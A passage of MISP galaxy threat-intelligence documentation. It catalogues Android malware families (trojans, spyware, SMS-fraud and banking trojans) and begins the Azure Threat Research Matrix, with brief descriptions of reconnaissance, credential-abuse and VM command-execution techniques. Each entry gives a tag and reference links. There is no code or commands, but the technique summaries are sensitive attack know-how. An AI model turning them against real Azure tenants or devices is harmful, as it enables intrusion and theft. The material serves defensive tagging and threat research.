Tetus is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Tetus"

Table 417. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-012409-4705-99

Tgpush

Tgpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tgpush"

Table 418. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032816-0259-99

Tigerbot

Tigerbot is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Tigerbot"

Table 419. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041010-2221-99

Tonclank

Tonclank is a Trojan horse that steals information and may open a back door on Android devices.

The tag is: misp-galaxy:android="Tonclank"

Table 420. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99

Trogle

Trogle is a worm for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Trogle"

Table 421. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-081213-5553-99

Twikabot

Twikabot is a Trojan horse for Android devices that attempts to steal information.

The tag is: misp-galaxy:android="Twikabot"

Table 422. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062614-5813-99

Uapush

Uapush is a Trojan horse for Android devices that steals information from the compromised device. It may also display advertisements and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Uapush"

Table 423. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040114-2910-99

Umeng

Umeng is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Umeng"

Table 424. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5749-99

Updtbot

Updtbot is a Trojan horse for Android devices that may arrive through SMS messages. It may then open a back door on the compromised device.

The tag is: misp-galaxy:android="Updtbot"

Table 425. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041611-4136-99

Upush

Upush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Upush"

Table 426. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-0733-99

Uracto

Uracto is a Trojan horse for Android devices that steals personal information and sends spam SMS messages to contacts found on the compromised device.

The tag is: misp-galaxy:android="Uracto"

Table 427. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-031805-2722-99

Uranico

Uranico is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Uranico"

Table 428. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-052803-3835-99

Usbcleaver

Usbcleaver is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Usbcleaver"

Table 429. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

Utchi

Utchi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Utchi"

Table 430. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-2536-99

Uten

Uten is a Trojan horse for Android devices that may send, block, and delete SMS messages on a compromised device. It may also download and install additional applications and attempt to gain root privileges.

The tag is: misp-galaxy:android="Uten"

Table 431. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-092316-4752-99

Uupay

Uupay is a Trojan horse for Android devices that steals information from the compromised device. It may also download additional malware.

The tag is: misp-galaxy:android="Uupay"

Table 432. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061714-1550-99

Uxipp

Uxipp is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Uxipp"

Table 433. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060910-5804-99

Vdloader

Vdloader is a Trojan horse for Android devices that opens a back door on the compromised device and steals confidential information.

The tag is: misp-galaxy:android="Vdloader"

Table 434. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080209-1420-99

VDopia

VDopia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VDopia"

Table 435. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-1559-99

Virusshield

Virusshield is a Trojan horse for Android devices that claims to scan apps and protect personal information, but has no real functionality.

The tag is: misp-galaxy:android="Virusshield"

Table 436. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040810-5457-99

VServ

VServ is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VServ"

Table 437. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-3117-99

Walkinwat

Walkinwat is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Walkinwat"

Table 438. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-033008-4831-99

Waps

Waps is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waps"

Table 439. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040406-5437-99

Waren

Waren is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waren"

Table 440. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5501-99

Windseeker

Windseeker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Windseeker"

Table 441. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101519-0720-99

Wiyun

Wiyun is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wiyun"

Table 442. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-5646-99

Wooboo

Wooboo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wooboo"

Table 443. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-5829-99

Wqmobile

Wqmobile is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wqmobile"

Table 444. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4926-99

YahooAds

YahooAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YahooAds"

Table 445. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-3229-99

Yatoot

Yatoot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Yatoot"

Table 446. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-031408-4748-99

Yinhan

Yinhan is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Yinhan"

Table 447. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-3350-99

Youmi

Youmi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Youmi"

Table 448. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4318-99

YuMe

YuMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YuMe"

Table 449. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-0322-99

Zeahache

Zeahache is a Trojan horse that elevates privileges on the compromised device.

The tag is: misp-galaxy:android="Zeahache"

Table 450. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-032309-5042-99

ZertSecurity

ZertSecurity is a Trojan horse for Android devices that steals information and sends it to a remote attacker.

The tag is: misp-galaxy:android="ZertSecurity"

Table 451. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-050820-4100-99

ZestAdz

ZestAdz is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ZestAdz"

Table 452. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052616-3821-99

Zeusmitmo

Zeusmitmo is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Zeusmitmo"

Table 453. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080818-0448-99

SLocker

The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.

The tag is: misp-galaxy:android="SLocker"

SLocker is also known as:

  • SMSLocker

Table 454. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/

http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/

Loapi

A malware strain known as Loapi will damage phones if users don’t remove it from their devices. Left to its own means, this modular threat will download a Monero cryptocurrency miner that will overheat and overwork the phone’s components, which will make the battery bulge, deform the phone’s cover, or even worse. Discovered by Kaspersky Labs, researchers say Loapi appears to have evolved from Podec, a malware strain spotted in 2015.

The tag is: misp-galaxy:android="Loapi"

Table 455. Table References

Links

https://www.bleepingcomputer.com/news/security/android-malware-will-destroy-your-phone-no-ifs-and-buts-about-it/

Podec

Late last year, we encountered an SMS Trojan called Trojan-SMS.AndroidOS.Podec which used a very powerful legitimate system to protect itself against analysis and detection. After we removed the protection, we saw a small SMS Trojan with most of its malicious payload still in development. Before long, though, we intercepted a fully-fledged version of Trojan-SMS.AndroidOS.Podec in early 2015. The updated version proved to be remarkable: it can send messages to premium-rate numbers employing tools that bypass the Advice of Charge system (which notifies users about the price of a service and requires authorization before making the payment). It can also subscribe users to premium-rate services while bypassing CAPTCHA. This is the first time Kaspersky Lab has encountered this kind of capability in any Android-Trojan.

The tag is: misp-galaxy:android="Podec"

Table 456. Table References

Links

https://securelist.com/sms-trojan-bypasses-captcha/69169//

Chamois

Chamois is one of the largest PHA families in Android to date and is distributed through multiple channels. While much of the backdoor version of this family was cleaned up in 2016, a new variant emerged in 2017. To avoid detection, this version employs a number of techniques, such as implementing custom code obfuscation, preventing user notifications, and not appearing in the device’s app list. Chamois apps, which in many cases come preloaded with the system image, try to trick users into clicking ads by displaying deceptive graphics to commit WAP or SMS fraud.

The tag is: misp-galaxy:android="Chamois"

Table 457. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html

IcicleGum

IcicleGum is a spyware PHA family whose apps rely on versions of the Igexin ads SDK that offer dynamic code-loading support. IcicleGum apps use this library’s code-loading features to fetch encrypted DEX files over HTTP from command-and-control servers. The files are then decrypted and loaded via class reflection to read and send phone call logs and other data to remote locations.

The tag is: misp-galaxy:android="IcicleGum"

IcicleGum has relationships with:

  • similar: misp-galaxy:android="Igexin" with estimative-language:likelihood-probability="likely"

Table 458. Table References

Links

https://blog.lookout.com/igexin-malicious-sdk

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

BreadSMS

BreadSMS is a large SMS-fraud PHA family that we started tracking at the beginning of 2017. These apps compose and send text messages to premium numbers without the user’s consent. In some cases, BreadSMS apps also implement subscription-based SMS fraud and silently enroll users in services provided by their mobile carriers. These apps are linked to a group of command-and-control servers whose IP addresses change frequently and that are used to provide the apps with premium SMS numbers and message text.

The tag is: misp-galaxy:android="BreadSMS"

Table 459. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

JamSkunk

JamSkunk is a toll-fraud PHA family composed of apps that subscribe users to services without their consent. These apps disable Wi-Fi to force traffic to go through users' mobile data connection and then contact command-and-control servers to dynamically fetch code that tries to bypass the network’s WAP service subscription verification steps. This type of PHA monetizes their abuse via WAP billing, a payment method that works through mobile data connections and allows users to easily sign up and pay for new services using their existing account (i.e., services are billed directly by the carrier, and not the service provider; the user does not need a new account or a different form of payment). Once authentication is bypassed, JamSkunk apps enroll the device in services that the user may not notice until they receive and read their next bill.

The tag is: misp-galaxy:android="JamSkunk"

Table 460. Table References

Links

https://blog.fosec.vn/malicious-applications-stayed-at-google-appstore-for-months-d8834ff4de59

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Expensive Wall

Expensive Wall is a family of SMS-fraud apps that affected a large number of devices in 2017. Expensive Wall apps use code obfuscation to slow down analysis and evade detection, and rely on the JS2Java bridge to allow JavaScript code loaded inside a Webview to call Java methods the way Java apps directly do. Upon launch, Expensive Wall apps connect to command-and-control servers to fetch a domain name. This domain is then contacted via a Webview instance that loads a webpage and executes JavaScript code that calls Java methods to compose and send premium SMS messages or click ads without users' knowledge.

The tag is: misp-galaxy:android="Expensive Wall"

Table 461. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

BambaPurple

BambaPurple is a two-stage toll-fraud PHA family that tries to trick users into installing it by disguising itself as a popular app. After install, the app disables Wi-Fi to force the device to use its 3G connection, then redirects to subscription pages without the user’s knowledge, clicks subscription buttons using downloaded JavaScript, and intercepts incoming subscription SMS messages to prevent the user from unsubscribing. In a second stage, BambaPurple installs a backdoor app that requests device admin privileges and drops a .dex file. This executable checks to make sure it is not being debugged, downloads even more apps without user consent, and displays ads.

The tag is: misp-galaxy:android="BambaPurple"

Table 462. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

KoreFrog

KoreFrog is a family of trojan apps that request permission to install packages and push other apps onto the device as system apps without the user’s authorization. System apps can be disabled by the user, but cannot be easily uninstalled. KoreFrog apps operate as daemons running in the background that try to impersonate Google and other system apps by using misleading names and icons to avoid detection. The KoreFrog PHA family has also been observed to serve ads, in addition to apps.

The tag is: misp-galaxy:android="KoreFrog"

Table 463. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Gaiaphish

Gaiaphish is a large family of trojan apps that target authentication tokens stored on the device to abuse the user’s privileges for various purposes. These apps use base64-encoded URL strings to avoid detection of the command-and-control servers they rely on to download APK files. These files contain phishing apps that try to steal GAIA authentication tokens that grant the user permissions to access Google services, such as Google Play, Google+, and YouTube. With these tokens, Gaiaphish apps are able to generate spam and automatically post content (for instance, fake app ratings and comments on Google Play app pages)

The tag is: misp-galaxy:android="Gaiaphish"

Table 464. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

RedDrop

RedDrop can perform a vast array of malicious actions, including recording nearby audio and uploading the data to cloud-storage accounts on Dropbox and Google Drive.

The tag is: misp-galaxy:android="RedDrop"

Table 465. Table References

Links

https://www.bleepingcomputer.com/news/security/new-reddrop-android-spyware-records-nearby-audio/

HenBox

HenBox apps masquerade as others such as VPN apps, and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores. HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China. HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy. HexBox apps target devices made by Chinese consumer electronics manufacture, Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps, however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds in stealing information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The tag is: misp-galaxy:android="HenBox"

Table 466. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/

MysteryBot

Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.

The tag is: misp-galaxy:android="MysteryBot"

MysteryBot has relationships with:

  • similar: misp-galaxy:malpedia="MysteryBot" with estimative-language:likelihood-probability="likely"

Table 467. Table References

Links

https://www.bleepingcomputer.com/news/security/new-mysterybot-android-malware-packs-a-banking-trojan-keylogger-and-ransomware/

Skygofree

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals. We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy. Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild. We named the malware Skygofree, because we found the word in one of the domains.

The tag is: misp-galaxy:android="Skygofree"

Skygofree has relationships with:

  • similar: misp-galaxy:malpedia="Skygofree" with estimative-language:likelihood-probability="likely"

Table 468. Table References

Links

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

BusyGasper

A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.

The tag is: misp-galaxy:android="BusyGasper"

Table 469. Table References

Links

https://www.bleepingcomputer.com/news/security/unsophisticated-android-spyware-monitors-device-sensors/

Triout

Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.

The tag is: misp-galaxy:android="Triout"

Table 470. Table References

Links

https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/

AndroidOS_HidenAd

active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store

The tag is: misp-galaxy:android="AndroidOS_HidenAd"

AndroidOS_HidenAd is also known as:

  • AndroidOS_HiddenAd

Table 471. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/

Razdel

The Banking Trojan found in Google Play is identified as Razdel, a variant of BankBot mobile banking Trojan. This newly observed variant has taken mobile threats to the next level incorporating: Remote access Trojan functions, SMS interception, UI (User Interface) Overlay with masqueraded pages etc.

The tag is: misp-galaxy:android="Razdel"

Table 472. Table References

Links

http://www.virusremovalguidelines.com/tag/what-is-bankbot

https://mobile.twitter.com/pr3wtd/status/1097477833625088000

Vulture

Vulture is an Android banking trojan found in Google Play by ThreatFabric. It uses screen recording and keylogging as main strategy to harvest login credentials.

The tag is: misp-galaxy:android="Vulture"

Table 473. Table References

Links

https://www.threatfabric.com/blogs/vultur-v-for-vnc.html

https://twitter.com/icebre4ker/status/1485651238175846400

Anubis

Starting in June 2018, a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t) was discovered. The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. Anubis Masquerades as Google Protect.

The tag is: misp-galaxy:android="Anubis"

Table 474. Table References

Links

https://securityintelligence.com/anubis-strikes-again-mobile-malware-continues-to-plague-users-in-official-app-stores/

GodFather

The Android banking Trojan Godfather is currently being utilized by cybercriminals to attack users of popular financial services across the globe. Godfather is designed to allow threat actors to harvest login credentials for banking applications and other financial services, and drain the accounts. To date, its victims include users of over 400 international targets, including banking applications, cryptocurrency wallets, and crypto exchanges. Few people realize that hiding under Godfather’s hood is an old banking Trojan called Anubis, whose functionality has become outdated due to Android updates and the efforts of malware detection and prevention providers. Group-IB first detected Godfather, a mobile banking Trojan that steals the banking and cryptocurrency exchange credentials of users, in June 2021. Almost a year later, in March 2022, researchers at Threat Fabric were the first to mention the banking Trojan publicly. A few months later, in June, the Trojan stopped being circulated. One of the reasons, Group-IB analysts believe, why Godfather was taken out of use was for developers to update the Trojan further. Sure enough, Godfather reappeared in September 2022, now with slightly modified WebSocket functionality.

The tag is: misp-galaxy:android="GodFather"

GodFather has relationships with:

  • successor-of: misp-galaxy:android="Anubis" with estimative-language:likelihood-probability="likely"

Table 475. Table References

Links

https://blog.group-ib.com/godfather-trojan

Azure Threat Research Matrix

The purpose of the Azure Threat Research Matrix (ATRM) is to educate readers on the potential of Azure-based tactics, techniques, and procedures (TTPs). It is not to teach how to weaponize or specifically abuse them. For this reason, some specific commands will be obfuscated or parts will be omitted to prevent abuse..

Azure Threat Research Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Microsoft - Karl Fosaaen - Nestori Syynimaa - Ryan Cobb - Roberto Rodriguez - Manuel Berrueta - Jonny Johnson - Dor Edry - Ram Pliskin - Nikhil Mittal - MITRE ATT&CK - AlertIQ - Craig Fretwell

AZT101 - Port Mapping

It is possible to view the open ports on a virtual machine by viewing the Virtual Network Interface’s assigned Network Security Group

The tag is: misp-galaxy:atrm="AZT101 - Port Mapping"

Table 476. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT101/AZT101

AZT102 - IP Discovery

It is possible to view the IP address on a resource by viewing the Virtual Network Interface

The tag is: misp-galaxy:atrm="AZT102 - IP Discovery"

Table 477. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT102/AZT102

AZT103 - Public Accessible Resource

A resource within Azure is accessible from the public internet.

The tag is: misp-galaxy:atrm="AZT103 - Public Accessible Resource"

Table 478. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT103/AZT103

AZT104 - Gather User Information

An adversary may obtain information about a User within Azure Active Directory. Details may include email addresses, first/last names, job information, addresses, and assigned roles. By default, all users are able to read other user’s roles and group memberships within AAD.

The tag is: misp-galaxy:atrm="AZT104 - Gather User Information"

Table 479. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT104/AZT104

AZT105 - Gather Application Information

An adversary may obtain information about an application within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT105 - Gather Application Information"

Table 480. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT105/AZT105

AZT106 - Gather Role Information

An adversary may obtain information about a role within Azure Active Directory or within Azure Resource Manager.

The tag is: misp-galaxy:atrm="AZT106 - Gather Role Information"

Table 481. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106

AZT106.1 - Gather AAD Role Information

An adversary may gather role assignments within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT106.1 - Gather AAD Role Information"

Table 482. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-1

AZT106.2 - Gather Application Role Information

An adversary may gather information about an application role & it’s member assignments within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT106.2 - Gather Application Role Information"

Table 483. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-2

AZT106.3 - Gather Azure Resources Role Assignments

An adversary may gather role assignments for a specific Azure Resource, Resource Group, or Subscription.

The tag is: misp-galaxy:atrm="AZT106.3 - Gather Azure Resources Role Assignments"

Table 484. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-3

AZT107 - Gather Resource Data

An adversary may obtain information and data within a resource.

The tag is: misp-galaxy:atrm="AZT107 - Gather Resource Data"

Table 485. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT107/AZT107

AZT108 - Gather Victim Data

An adversary may access a user’s personal data if their account is compromised. This includes data such as email, OneDrive, Teams, etc.

The tag is: misp-galaxy:atrm="AZT108 - Gather Victim Data"

Table 486. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT108/AZT108

AZT201 - Valid Credentials

Adversaries may login to AzureAD using valid credentials. By logging in with valid credentials to an account or service principal, the adversary will assume all privileges of that account or service principal. If the account is privileged, this may lead to other tactics, such as persistence or privilege escalation.

The tag is: misp-galaxy:atrm="AZT201 - Valid Credentials"

Table 487. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201

AZT201.1 - User Account

By obtaining valid user credentials, an adversary may login to AzureAD via command line or through the Azure Portal.

The tag is: misp-galaxy:atrm="AZT201.1 - User Account"

Table 488. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201-1

AZT201.2 - Service Principal

By obtaining a valid secret or certificate, an adversary may login to AzureAD via command line.

The tag is: misp-galaxy:atrm="AZT201.2 - Service Principal"

Table 489. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201-2

AZT202 - Password Spraying

An adversary may potentially gain access to AzureAD by guessing a common password for multiple users.

The tag is: misp-galaxy:atrm="AZT202 - Password Spraying"

Table 490. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT202/AZT202

An adversary may lure a victim into giving their access to a malicious application registered in AzureAD.

The tag is: misp-galaxy:atrm="AZT203 - Malicious Application Consent"

Table 491. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT203/AZT203

AZT301 - Virtual Machine Scripting

Adversaries may abuse access to virtual machines by executing a script through various methods in order to gain access to the Virtual Machine.

The tag is: misp-galaxy:atrm="AZT301 - Virtual Machine Scripting"

Table 492. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301

AZT301.1 - RunCommand

By utilizing the 'RunCommand' feature on a Virtual Machine, an attacker can pass:* Windows: PowerShell commands to the VM as SYSTEM.* Linux: Shell commands to the VM as root.

The tag is: misp-galaxy:atrm="AZT301.1 - RunCommand"

Table 493. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-1

AZT301.2 - CustomScriptExtension

By utilizing the 'CustomScriptExtension' extension on a Virtual Machine, an attacker can pass PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.2 - CustomScriptExtension"

Table 494. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-2

AZT301.3 - Desired State Configuration

By utilizing the 'Desired State Configuration extension' extension on a Virtual Machine, an attacker can pass PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.3 - Desired State Configuration"

Table 495. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-3

By utilizing Compute Gallery Applications, an attacker can pass MS-DOS or PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.4 - Compute Gallery Application"

Table 496. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-4

AZT301.5 - AKS Command Invoke

By utilizing 'command invoke' on an Azure Kubernetes Service (AKS) cluster, an attacker can pass commands to the cluster’s VM as SYSTEM

The tag is: misp-galaxy:atrm="AZT301.5 - AKS Command Invoke"

Table 497. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-5

AZT301.6 - Vmss Run Command

By utilizing the 'RunCommand' feature on a virtual machine scale set (Vmss), an attacker can execute a command on an instance or instances of VMs as:* Windows: PowerShell commands to the VM as SYSTEM.* Linux: Shell commands to the VM as root.

The tag is: misp-galaxy:atrm="AZT301.6 - Vmss Run Command"

Table 498. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-6

AZT301.7 - Serial Console

By utilizing the serial console feature on an Azure Virtual Machine, an adversary can pass arbitrary commands.

The tag is: misp-galaxy:atrm="AZT301.7 - Serial Console"

Table 499. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-7

AZT302 - Serverless Scripting

Adversaries may abuse access to serverless resources that are able to execute PowerShell or Python scripts on an Azure resource.

The tag is: misp-galaxy:atrm="AZT302 - Serverless Scripting"

Table 500. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302

AZT302.1 - Automation Account Runbook Hybrid Worker Group

By utilizing an Automation Account configured with a Hybrid Worker Group, an attacker can execute Azure commands on any Azure VM within that Hybrid Worker Group.

The tag is: misp-galaxy:atrm="AZT302.1 - Automation Account Runbook Hybrid Worker Group"

Table 501. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-1

AZT302.2 - Automation Account Runbook RunAs Account

By utilizing an Automation Account configured with a RunAs account, an attacker can execute commands on an Azure VM via RunCommand [(AZT301.1)](../AZT301/AZT301-1.md) if that service principal has the correct role and privileges.

The tag is: misp-galaxy:atrm="AZT302.2 - Automation Account Runbook RunAs Account"

Table 502. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-2

AZT302.3 - Automation Account Runbook Managed Identity

By utilizing an Automation Account configured with a Managed Identity, an attacker can execute commands on an Azure VM via RunCommand [(AZT301.1)](../AZT301/AZT301-1.md) if that service principal has the correct role and privileges.

The tag is: misp-galaxy:atrm="AZT302.3 - Automation Account Runbook Managed Identity"

Table 503. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-3

AZT302.4 - Function Application

By utilizing a Function Application, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT302.4 - Function Application"

Table 504. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-4

AZT303 - Managed Device Scripting

Adversaries may abuse access to any managed devices in AzureAD by executing PowerShell or Python scripts on them.

The tag is: misp-galaxy:atrm="AZT303 - Managed Device Scripting"

Table 505. Table References

Links

